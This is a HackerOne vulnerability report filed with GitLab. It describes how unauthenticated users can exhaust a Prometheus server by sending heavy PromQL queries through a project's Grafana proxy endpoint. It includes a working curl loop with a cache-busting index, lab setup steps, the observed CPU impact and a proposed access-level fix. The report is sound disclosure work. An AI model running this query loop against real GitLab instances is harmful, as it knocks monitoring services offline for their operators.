DOS and high resource consumption of Prometheus server through abuse of Grafana integration proxy endpoint

HackerOne report #1723106 by joaxcar on 2022-10-04, assigned to GitLab Team:

Report

As I previously mentioned in my report on path traversal in the Grafana integration an unauthenticated user can DOS the configured Prometheus server by sending heavy PromQL queries to the https://gitlab.example.com/group1/project1/-/grafana/proxy/ endpoint. As this issue did not get address by the patch for the path traversal I thought that I might as well report it separately

Summary

I am no Prometheus expert, so the described scenario can probably be expanded and improved upon (from a DoS perspective). But I did force my docker container with 16 cores to work at 100% CPU constant with only 20 requests (the requests are asynchronous, meaning that the connection from the attacker to GitLab will succeed, while the connection between GitLab and Prometheus will persist). When the attack was executed, I could not restart Prometheus from the terminal with gitlab-ctl stop prometheus as the service was unresponsive and a gitlab-ctl restart did not fix it. I had to stop the docker container to have it stop. The impact of the attack depend somewhat on the amount of data on the Prometheus server, but as I only test this on my localhost GitLab Prometheus server it is almost empty compared to real life servers.

The setup

I booted up a GitLab Omnibus instance in a docker container, this includes a Grafana instance (https://gitlab.example.com/-/grafana) and a Prometheus instance (http://localhost:9090). I also configured SSL and a (spoofed with host file) DNS record of my server.

The Grafana instance already have the Prometheus instance as a datasource, so its possible to use this instance for test purposes. I then configured the Grafana integration in a public project, following https://docs.gitlab.com/ee/operations/metrics/embed_grafana.html .

Lets say that the project is located at https://gitlab.example.com/group1/project1 then the proxy endpoint is located at https://gitlab.example.com/group1/project1/-/grafana/proxy/ .This -/grafana/proxy have nothing to do with the Grafana instance in Omnibus, they just look similar. The datasource ID for Prometheus will probably be either 1 or 2.

You might need to run the server for a while to have some data in Prometheus. After a fresh boot I used Burp to perform a scan towards my localhost GitLab instance to fill up the server with HTTP requests, I did this two times with a spacing of 24 hours.

The attack

As an unauthenticated user, I can now DOS the Prometheus server (and possibly also affect the overall system state of the docker instance) by running this command in a terminal

for index in {1..20}  
do  
curl 'https://gitlab.example.com/group1/project1/-/grafana/proxy/2/api/v1/query_range?query=min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100'$index'h%5D)))&start_time=1654749435&end_time=1654771035&step=15'  
done

To get it working, you might need to modify start_time and end_time to something relevant (use date +%s in a terminal to get current timestamp). Also, the ID after grafana/proxy/ need to match the ID of the Prometheus datasource in Grafana. If 20 requests are not enough, try to increase the number.

In the docker image run htop or top to monitor the CPU

Some details

The anatomy of the requests looks like this pulled apart

https://gitlab.example.com/group1/project1/-/grafana/proxy <-- The project proxy endpoint

/2/api/v1/query_range <-- API call to Prometheus through Grafana proxy

?query= <-- Start of query

<--  An expensive query, just a mess that I made up trying to eat resources  -->  
min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100

$index <-- Index used as cache buster

h%5D)))&start_time=1654749435&end_time=1654771035&step=15

Important to note is that the query is arbitrary, I just tried to construct one that was heavy enough to tilt the server. This could probably be made way heavier. Also note the use of index in the query, this is a "cache buster" that is needed as GitLab backend will not run multiple commands towards Prometheus if the query is identical.

Result

Here are some images from my test run on my local system

This is the server htop output directly after getting 20 requests from the attacker. All 16 cores are working at 100%

This is the state of the server 5 min later, no additional requests from the attacker have been made

When accessing Grafana through the web client I can manage to get an extremely simple request to run, it usually take about 50 milliseconds to get the response. During the attack it took 1 minute.

Steps to reproduce

(if you have any other Grafana instance you can test use that one. I will describe the attack with docker GitLab omnibus)

Boot up a docker image of the latest gitlab omnibus (see https://docs.gitlab.com/ee/install/docker.html)
Follow this guide to enable admin login (and username/password login) on the local grafana instance https://docs.gitlab.com/omnibus/settings/grafana.html
Log in to the new grafana instance on http://example.gitlab.com as admin
Create an API key by visiting /-/grafana/org/apikeys make sure to generate an Admin key
Create a new project on the GitLab instance
Go to http://gitlab.example.com/GROUP/PROJECT/-/settings/operations and expand Grafana integration
Configure with http://example.gitlab.com/-/grafana and the API key
Now make sure to load the Grafana instance with some data. Make a bunch of requests to the GitLab instance over a period of time
Take a terminal and get a shell on the docker image. Ex

docker exec -it gitlab /bin/bash

run top to monitor CPU level
Now open another terminal and run

date +%s

Take the current date and update this script starttime and endtime

for index in {1..100}  
do  
curl 'https://gitlab.example.com/group1/project1/-/grafana/proxy/2/api/v1/query_range?query=min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100'$index'h%5D)))&start_time=1654749435&end_time=1654771035&step=15'  
done

Run it and watch the CPU in top. If there is enough data in the instance all processors should spike to 100%

Impact

DOS and high resource consumption on Prometheus server

What is the current bug behavior?

There is no special permissions to run arbitrary queries (as admin, since the grafana token is admin) towards a configured Grafana instance

There are two issues, first of any user with any access to the project can execute arbitrary queries (unauthenticated users on public projects). Second, as the queries are arbitrary they can be how complex as the attacker wants and thus break the Prometheus server. A user can make over 100 requests in one go and GitLab will gladly pass them along to Grafana. Even if It looks like GitLab has a 20 or so concurrent limit, the rest are run when other finish.

What is the expected correct behavior?

Users need to be limited in what queries they are allowed to run. Or there should be an restriction on who can make the queries.

Output of checks

This bug happens on GitLab.com

Results of GitLab environment info

[Redacted]

Impact

DOS and high resource consumption on Prometheus server

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section:

Proposed solution

From #378456 (comment 1194850384):

Elevate access levels to* Reporter+ for public projects only, leaving private/protected as-is.

Edited Feb 14, 2023 by Sarah Yasonik